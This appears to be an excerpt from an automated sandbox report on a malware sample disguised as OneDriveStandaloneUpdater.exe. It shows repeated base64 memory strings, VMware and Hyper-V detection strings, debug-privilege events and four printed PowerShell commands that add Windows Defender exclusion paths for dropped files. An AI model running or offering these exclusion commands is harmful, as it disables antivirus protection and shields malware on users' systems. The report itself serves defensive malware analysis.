Source: csrss.exe, 00000043.00000002.2509374920.00000000130BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 9hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]P
Source: MjlsqDcSPlv.exe, 0000003F.00000002.2004087524.000000000294F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA
Source: MjlsqDcSPlv.exe, 0000003F.00000002.2513743333.00000000129EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 9hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: MjlsqDcSPlv.exe, 0000003F.00000002.2004087524.0000000002947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA"
Source: csrss.exe, 00000043.00000002.2509374920.000000001310F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: L1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]P
Source: MjlsqDcSPlv.exe, 0000003F.00000002.2513743333.0000000012A3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: L1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: OneDriveStandaloneUpdater.exe, 00000000.00000002.1386721859.000000001B006000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_
Source: MjlsqDcSPlv.exe, 0000003F.00000002.2662319769.000000001B330000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG8
Source: csrss.exe, 00000043.00000002.2011549041.0000000003017000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: clcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA"
Source: csrss.exe, 00000043.00000002.1980050735.00000000010D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}me#
Source: OneDriveStandaloneUpdater.exe, 00000038.00000002.2634469219.000000001ADF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: csrss.exe, 00000043.00000002.2011549041.000000000301F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA
Source: csrss.exe, 00000020.00000002.1601287546.000000001C022000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 00000029.00000002.1717735778.00000000010E3000.00000004.00000020.00020000.00000000.sdmp, MjlsqDcSPlv.exe, 0000002E.00000002.1787525289.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 00000033.00000002.2450827894.000000001B800000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000037.00000002.1901243519.0000020D99209000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 00000043.00000002.1980050735.00000000010D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe'
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\MjlsqDcSPlv.exe'
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe'
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\MjlsqDcSPlv.exe'
